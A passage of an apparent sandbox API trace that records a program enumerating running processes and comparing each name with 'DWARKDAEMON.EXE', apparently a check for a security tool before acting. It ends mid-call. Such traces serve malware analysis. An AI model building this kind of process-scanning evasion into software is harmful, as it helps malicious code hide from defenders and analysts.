[0163.502] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.502] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.502] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.502] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.503] lstrlenW (lpString="svchost.exe") returned 11 [0163.503] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.503] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.503] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.503] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.503] lstrlenW (lpString="svchost.exe") returned 11 [0163.503] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.503] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.503] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.504] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.504] lstrlenW (lpString="svchost.exe") returned 11 [0163.504] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.504] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.504] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.505] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.505] lstrlenW (lpString="svchost.exe") returned 11 [0163.505] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.505] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.505] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.505] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.505] lstrlenW (lpString="audiodg.exe") returned 11 [0163.505] CharUpperBuffW (in: lpsz="audiodg.exe", cchLength=0xb | out: lpsz="AUDIODG.EXE") returned 0xb [0163.505] lstrcmpW (lpString1="AUDIODG.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.505] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.506] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.506] lstrlenW (lpString="svchost.exe") returned 11 [0163.506] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.506] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.506] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.507] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.507] lstrlenW (lpString="svchost.exe") returned 11 [0163.507] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.507] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.507] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0163.507] lstrcpyW (in: lpString1=0x18f6dc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0163.507] lstrlenW (lpString="spoolsv.exe") returned 11 [0163.508] CharUpperBuffW (in: lpsz="spoolsv.exe", cchLength=0xb | out: lpsz="SPOOLSV.EXE") returned 0xb [0163.508] lstrcmpW (lpString1="SPOOLSV.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.508] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.508] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.508] lstrlenW (lpString="svchost.exe") returned 11 [0163.508] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.508] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.508] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.509] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.509] lstrlenW (lpString="taskhost.exe") returned 12 [0163.509] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.509] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.509] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.510] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.510] lstrlenW (lpString="taskeng.exe") returned 11 [0163.510] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.510] lstrcmpW (lpString1="TASKENG.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.510] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0163.510] lstrcpyW (in: lpString1=0x18f6dc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0163.510] lstrlenW (lpString="dwm.exe") returned 7 [0163.510] CharUpperBuffW (in: lpsz="dwm.exe", cchLength=0x7 | out: lpsz="DWM.EXE") returned 0x7 [0163.510] lstrcmpW (lpString1="DWM.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.510] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x658, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0163.511] lstrcpyW (in: lpString1=0x18f6dc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0163.511] lstrlenW (lpString="explorer.exe") returned 12 [0163.511] CharUpperBuffW (in: lpsz="explorer.exe", cchLength=0xc | out: lpsz="EXPLORER.EXE") returned 0xc [0163.511] lstrcmpW (lpString1="EXPLORER.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.511] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x368, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0163.512] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskeng.exe" | out: lpString1="taskeng.exe") returned="taskeng.exe" [0163.512] lstrlenW (lpString="taskeng.exe") returned 11 [0163.512] CharUpperBuffW (in: lpsz="taskeng.exe", cchLength=0xb | out: lpsz="TASKENG.EXE") returned 0xb [0163.512] lstrcmpW (lpString1="TASKENG.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.512] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="MSOSYNC.EXE")) returned 1 [0163.513] lstrcpyW (in: lpString1=0x18f6dc, lpString2="MSOSYNC.EXE" | out: lpString1="MSOSYNC.EXE") returned="MSOSYNC.EXE" [0163.513] lstrlenW (lpString="MSOSYNC.EXE") returned 11 [0163.513] CharUpperBuffW (in: lpsz="MSOSYNC.EXE", cchLength=0xb | out: lpsz="MSOSYNC.EXE") returned 0xb [0163.513] lstrcmpW (lpString1="MSOSYNC.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.513] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0163.513] lstrcpyW (in: lpString1=0x18f6dc, lpString2="taskhost.exe" | out: lpString1="taskhost.exe") returned="taskhost.exe" [0163.513] lstrlenW (lpString="taskhost.exe") returned 12 [0163.513] CharUpperBuffW (in: lpsz="taskhost.exe", cchLength=0xc | out: lpsz="TASKHOST.EXE") returned 0xc [0163.513] lstrcmpW (lpString1="TASKHOST.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.513] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="calls ccd copyright.exe")) returned 1 [0163.514] lstrcpyW (in: lpString1=0x18f6dc, lpString2="calls ccd copyright.exe" | out: lpString1="calls ccd copyright.exe") returned="calls ccd copyright.exe" [0163.514] lstrlenW (lpString="calls ccd copyright.exe") returned 23 [0163.514] CharUpperBuffW (in: lpsz="calls ccd copyright.exe", cchLength=0x17 | out: lpsz="CALLS CCD COPYRIGHT.EXE") returned 0x17 [0163.514] lstrcmpW (lpString1="CALLS CCD COPYRIGHT.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.514] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="tri.exe")) returned 1 [0163.515] lstrcpyW (in: lpString1=0x18f6dc, lpString2="tri.exe" | out: lpString1="tri.exe") returned="tri.exe" [0163.515] lstrlenW (lpString="tri.exe") returned 7 [0163.515] CharUpperBuffW (in: lpsz="tri.exe", cchLength=0x7 | out: lpsz="TRI.EXE") returned 0x7 [0163.515] lstrcmpW (lpString1="TRI.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.515] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x73c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="navigation-jay.exe")) returned 1 [0163.516] lstrcpyW (in: lpString1=0x18f6dc, lpString2="navigation-jay.exe" | out: lpString1="navigation-jay.exe") returned="navigation-jay.exe" [0163.516] lstrlenW (lpString="navigation-jay.exe") returned 18 [0163.516] CharUpperBuffW (in: lpsz="navigation-jay.exe", cchLength=0x12 | out: lpsz="NAVIGATION-JAY.EXE") returned 0x12 [0163.516] lstrcmpW (lpString1="NAVIGATION-JAY.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.517] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="chevrolet-play-mel.exe")) returned 1 [0163.517] lstrcpyW (in: lpString1=0x18f6dc, lpString2="chevrolet-play-mel.exe" | out: lpString1="chevrolet-play-mel.exe") returned="chevrolet-play-mel.exe" [0163.517] lstrlenW (lpString="chevrolet-play-mel.exe") returned 22 [0163.517] CharUpperBuffW (in: lpsz="chevrolet-play-mel.exe", cchLength=0x16 | out: lpsz="CHEVROLET-PLAY-MEL.EXE") returned 0x16 [0163.517] lstrcmpW (lpString1="CHEVROLET-PLAY-MEL.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.517] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="clause_swaziland_complimentary.exe")) returned 1 [0163.518] lstrcpyW (in: lpString1=0x18f6dc, lpString2="clause_swaziland_complimentary.exe" | out: lpString1="clause_swaziland_complimentary.exe") returned="clause_swaziland_complimentary.exe" [0163.518] lstrlenW (lpString="clause_swaziland_complimentary.exe") returned 34 [0163.518] CharUpperBuffW (in: lpsz="clause_swaziland_complimentary.exe", cchLength=0x22 | out: lpsz="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE") returned 0x22 [0163.518] lstrcmpW (lpString1="CLAUSE_SWAZILAND_COMPLIMENTARY.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.518] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="ship-loans.exe")) returned 1 [0163.519] lstrcpyW (in: lpString1=0x18f6dc, lpString2="ship-loans.exe" | out: lpString1="ship-loans.exe") returned="ship-loans.exe" [0163.519] lstrlenW (lpString="ship-loans.exe") returned 14 [0163.519] CharUpperBuffW (in: lpsz="ship-loans.exe", cchLength=0xe | out: lpsz="SHIP-LOANS.EXE") returned 0xe [0163.519] lstrcmpW (lpString1="SHIP-LOANS.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.519] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="isolation.exe")) returned 1 [0163.519] lstrcpyW (in: lpString1=0x18f6dc, lpString2="isolation.exe" | out: lpString1="isolation.exe") returned="isolation.exe" [0163.519] lstrlenW (lpString="isolation.exe") returned 13 [0163.519] CharUpperBuffW (in: lpsz="isolation.exe", cchLength=0xd | out: lpsz="ISOLATION.EXE") returned 0xd [0163.519] lstrcmpW (lpString1="ISOLATION.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.519] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="abc.exe")) returned 1 [0163.520] lstrcpyW (in: lpString1=0x18f6dc, lpString2="abc.exe" | out: lpString1="abc.exe") returned="abc.exe" [0163.520] lstrlenW (lpString="abc.exe") returned 7 [0163.520] CharUpperBuffW (in: lpsz="abc.exe", cchLength=0x7 | out: lpsz="ABC.EXE") returned 0x7 [0163.520] lstrcmpW (lpString1="ABC.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.520] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.521] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.521] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.521] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.521] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.521] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.521] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.522] lstrlenW (lpString="english_performing.exe") returned 22 [0163.522] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.522] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.522] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.522] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.522] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.522] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.522] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.522] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.523] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.523] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.523] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.523] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="DWARKDAEMON.EXE") returned -1 [0163.523] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.524] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.524] lstrlenW (lpString="volume.exe") returned 10 [0163.524] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.524] lstrcmpW (lpString1="VOLUME.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.524] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.524] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.524] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.524] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.524] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.524] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.525] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.525] lstrlenW (lpString="objectives-bailey-audit.exe") returned 27 [0163.525] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.525] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.525] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.526] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.526] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.526] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.526] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.526] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.526] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.527] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.527] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.527] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.527] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.527] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.527] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.527] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.527] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.527] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.528] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.528] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.528] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.528] lstrcmpW (lpString1="EXCEL.EXE", lpString2="DWARKDAEMON.EXE") returned 1 [0163.528] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.529] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.529] lstrlenW (lpString="svchost.exe") returned 11 [0163.529] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.529] lstrcmpW (lpString1="SVCHOST.EXE", 